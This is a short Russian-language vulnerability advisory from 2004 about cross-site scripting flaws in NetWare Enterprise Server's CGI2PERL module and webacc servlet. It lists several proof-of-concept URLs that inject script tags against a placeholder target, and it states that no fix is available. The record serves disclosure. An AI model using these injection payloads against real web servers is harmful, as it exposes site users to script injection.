Дата публикации: | 27.01.2004 |
Всего просмотров: | 1121 |
Опасность: | Низкая |
Наличие исправления: | |
Количество уязвимостей: | 1 |
CVE ID: | Нет данных |
Вектор эксплуатации: | |
Воздействие: | |
CWE ID: | Нет данных |
Наличие эксплоита: | Нет данных |
Уязвимые продукты: | |
Уязвимые версии: NetWare Enterprise Server
Описание: Уязвимость обнаружена в NetWare Enterprise Server в модуле CGI2PERL. Удаленный пользователь может выполнить XSS нападение. Пример/Эксплоит: http://[target]/perl/\<sCRIPT>alert("d")</sCR IPT>\.pl http://[target]/perl/<script>alert('XSS')</script>.pl http://[target]/servlet/webacc?User.id="><script>alert('XSS')</script> http://[target]/servlet/web acc?User.id=&User.password=&User.context=cwqlNomoqd Oq&User.interface=frames&error=login&merge=webacc&action=User.Login&GWAP.ver sion="><script>alert('XSS')</script> http://[target]/nsn/"<script%20language=vbscript>msgbox%20sadas</script>".bas URL производителя: http://www.novell.com Решение:Способов устранения обнаруженной уязвимости не существует в настоящее время. |
|
Ссылки: | NetWare-Enterprise-Web-Server/5.1/6.0 Multiple Vulnerabilities |